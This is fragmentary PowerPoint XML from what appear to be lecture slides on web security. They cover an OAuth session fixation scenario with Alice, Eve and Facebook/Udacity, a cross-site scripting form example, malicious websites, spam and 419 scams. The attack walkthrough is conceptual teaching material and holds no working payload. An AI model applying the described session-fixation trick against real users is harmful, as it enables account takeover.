          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729520" y="2372040"/>
            <a:ext cx="3439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It’s Alice. She has 5 friends.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4" name="TextBox 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226480" y="3285360"/>
            <a:ext cx="1440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Z, callback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5" name="TextBox 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245160" y="1005840"/>
            <a:ext cx="26701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Z linked to Alice’s session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6" name="TextBox 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764040" y="1068480"/>
            <a:ext cx="21805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Knows Udacity’s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secret is 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7" name="Rounded Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3006720" y="1162440"/>
            <a:ext cx="3542760" cy="44604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ambria"/>
              </a:rPr>
              <a:t>Z is authenticated as Alice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88" name="TextBox 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-296640" y="6471000"/>
            <a:ext cx="3992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OAuth Security Advisory: 2009.1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5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169A48"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Single Sign-On: OAuth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1290" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="1768680"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1291" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5266440" y="4996800"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1292" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797520" y="1768680"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1293" name="Straight Arrow Connector 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1315440" y="3780360"/>
            <a:ext cx="615960" cy="114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94" name="Straight Arrow Connector 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5922000" y="3634560"/>
            <a:ext cx="487080" cy="126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95" name="Straight Arrow Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760840" y="2246400"/>
            <a:ext cx="3344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96" name="Straight Arrow Connector 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2760120" y="2759400"/>
            <a:ext cx="3344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97" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5789160" y="6105960"/>
            <a:ext cx="10270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mbria"/>
              </a:rPr>
              <a:t>Alice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298" name="Picture 2" descr="Facebook Changes"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693560" y="2909160"/>
            <a:ext cx="783720" cy="838440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1299" name="Picture 4" descr="File:Udacity Logo.svg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect b="27970"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1542600" y="2863080"/>
            <a:ext cx="1183680" cy="930240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1300" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440" y="3889080"/>
            <a:ext cx="16120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I’d like to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sign in with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Facebook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1" name="Straight Arrow Connector 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1595160" y="3652200"/>
            <a:ext cx="621720" cy="1065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02" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898640" y="3826440"/>
            <a:ext cx="28328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Redirect to Facebook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(include callback URL)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and identifier Z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3" name="Straight Arrow Connector 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6141960" y="3787200"/>
            <a:ext cx="418680" cy="1143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04" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419880" y="3793680"/>
            <a:ext cx="27187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Give your permission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to Udacity?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5" name="Straight Arrow Connector 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6302520" y="3836880"/>
            <a:ext cx="440640" cy="107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06" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381000" y="4383000"/>
            <a:ext cx="1990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Huh? Whatever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7" name="Straight Arrow Connector 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6504840" y="3951720"/>
            <a:ext cx="424440" cy="1077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08" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7257600" y="4736880"/>
            <a:ext cx="1972800" cy="173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OK. Here’s a special token “X”. Redirect to callback with identifier Z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9" name="Straight Arrow Connector 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2636280" y="3672000"/>
            <a:ext cx="2967840" cy="1424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10" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930400" y="3265560"/>
            <a:ext cx="2673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Here’s the token “X”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for user Z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1" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2341080" y="1794960"/>
            <a:ext cx="4212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Who has token “X”? My secret is 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2" name="TextBox 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354960" y="1330200"/>
            <a:ext cx="2374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Facebook secret: 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3" name="TextBox 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729520" y="2372040"/>
            <a:ext cx="3439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It’s Alice. She has 5 friends.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4" name="TextBox 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226480" y="3285360"/>
            <a:ext cx="1440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Z, callback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5" name="TextBox 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245160" y="1005840"/>
            <a:ext cx="26701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Z linked to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Eve</a:t>
            </a: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’s session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6" name="TextBox 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764040" y="1068480"/>
            <a:ext cx="21805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Knows Udacity’s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secret is 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7" name="Rounded Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3006720" y="1162440"/>
            <a:ext cx="3542760" cy="446040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="A85924"/>
            </a:solidFill>
            <a:miter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ambria"/>
              </a:rPr>
              <a:t>Eve is authenticated as Alice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318" name="Picture 36"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500120" y="4996800"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1319" name="TextBox 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060280" y="6104880"/>
            <a:ext cx="781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Cambria"/>
              </a:rPr>
              <a:t>Eve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20" name="TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635640" y="5551200"/>
            <a:ext cx="14569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Hey Alice!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Check out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this URL!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1" name="Straight Arrow Connector 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608640" y="5475600"/>
            <a:ext cx="1649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round/>
            <a:tailEnd type="triangle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22" name="Rounded Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439920" y="2794680"/>
            <a:ext cx="8152920" cy="1185120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="1" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Session Fixation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> Attack – Fixed in OAuth 2.0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23" name="TextBox 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-296640" y="6471000"/>
            <a:ext cx="3992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mbria"/>
              </a:rPr>
              <a:t>OAuth Security Advisory: 2009.1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28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Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-lt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 sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRP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Cross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Site Scripting (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XSS)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Injection Attacks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Cross Site Request Forgery (CSRF)</a:t>
            </a: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Multi-Party Web Applications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charset="-122"/>
              </a:rPr>
              <a:t>Web Security Issues</a:t>
            </a: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Continue assignment…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37893" name="Picture 5" descr="&#10;prodsec04.jpg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66875" cy="17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1026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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Security Issues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3" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1295400"/>
            <a:ext cx="7543800" cy="350719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spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Malicious websites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strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>SPAM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spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>419 Scams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strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Phishing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spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>DDOS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strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Botnets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2600" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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28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52287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Malicious websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1295400"/>
            <a:ext cx="8153400" cy="31686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More that 3 million web pages on the internet are malicious.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pc="-1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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According to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Neils</a:t>
            </a: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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Provos</a:t>
            </a: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, senior staff software engineer with Google, the percent is one in 1,000.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600" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>The expect call these attacks “drive-by downloads”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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2800" strike="noStrike" spc="-1" dirty="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4191000"/>
            <a:ext cx="8153400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Malicious websites...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ambria"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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China		- 67%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ambria"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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USA		- 15%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ambria"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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Russia		- 4%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ambria"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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Malaysia	- 2.2%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ambria"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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Korea		- 2%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31070609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Picture 5" descr="Screen Shot 2012-07-02 at 3.31.55 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="673200" y="1168560"/>
            <a:ext cx="3441240" cy="1269720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="652" name="Picture 6" descr="Screen Shot 2012-07-02 at 3.32.03 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384880" y="1143000"/>
            <a:ext cx="3072960" cy="1294920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Snip Single Corner Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3173400"/>
            <a:ext cx="6400440" cy="2058480"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667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solidFill>
              <a:srgbClr val="414242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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form name="XSS" action="#" method="GET”&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;p&gt;What's your name?&lt;/p&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="text" name="name"&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="Submit"&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;pre&gt;Hello David&lt;/pre&gt;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54" name="Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1650960"/>
            <a:ext cx="685440" cy="38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95A5A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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655" name="Straight Arrow Connector 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4571280" y="2438280"/>
            <a:ext cx="2349000" cy="73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headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow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615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Malicious websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1295400"/>
            <a:ext cx="8153400" cy="44305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Preventive Measures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Use latest browser software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Internet Explorer (Edge)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Mozilla Firefox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Opera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Google browser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600" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Explorer version 6 and 7 are somewhat the most vulnerable as well as most widely use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>It is highly recommended to upgrade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="28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80268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SPAM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3" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1295400"/>
            <a:ext cx="815340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SPAM is unsolicited e-mail in the internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2286000"/>
            <a:ext cx="8153400" cy="19375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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Cost of SPAM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Loss of productivity is the main concern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There is also the cost of bandwidth taken by spam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Storage and network infrastructure costs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Loss of legitimate email message. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4419600"/>
            <a:ext cx="8153400" cy="19375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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Preventive measures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Use spam detection algorithms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White listing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Black listing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Training based algorithm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900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941442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419 Nigerian Scams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3" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1295400"/>
            <a:ext cx="5943600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An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>advance fee fraud </a:t>
            </a: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is a confidence trick in which the target is persuaded to advance sums f money in he hope of realizing a very much larger gain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3581400"/>
            <a:ext cx="594360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The number “419” refers to the article of the Nigerian Criminal Code (Cheating) dealing with fraud.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4930565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419 Nigerian Scams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239000" cy="4015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7239000" cy="401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807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419 Nigerian Scams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" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1295400"/>
            <a:ext cx="5943600" cy="19375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Prevention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latin typeface="Cambria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Service like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.419eater.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> has users pretend to be naïve and end up wasting the scammers efforts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12298601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Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-lt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 sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRP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Cross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Site Scripting (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XSS)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Injection Attacks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Cross Site Request Forgery (CSRF)</a:t>
            </a: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Multi-Party Web Applications</a:t>
            </a:r>
          </a:p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Web Security Issues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charset="-122"/>
              </a:rPr>
              <a:t>Continue assignment…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37893" name="Picture 5" descr="&#10;prodsec04.jpg                                                  00093991&#10;Ridiculous                     B74677A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66875" cy="17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5801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kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="169A48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Continue assignment…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48"/>
              </a:solidFill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251520" y="1196752"/>
            <a:ext cx="8568952" cy="3756248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
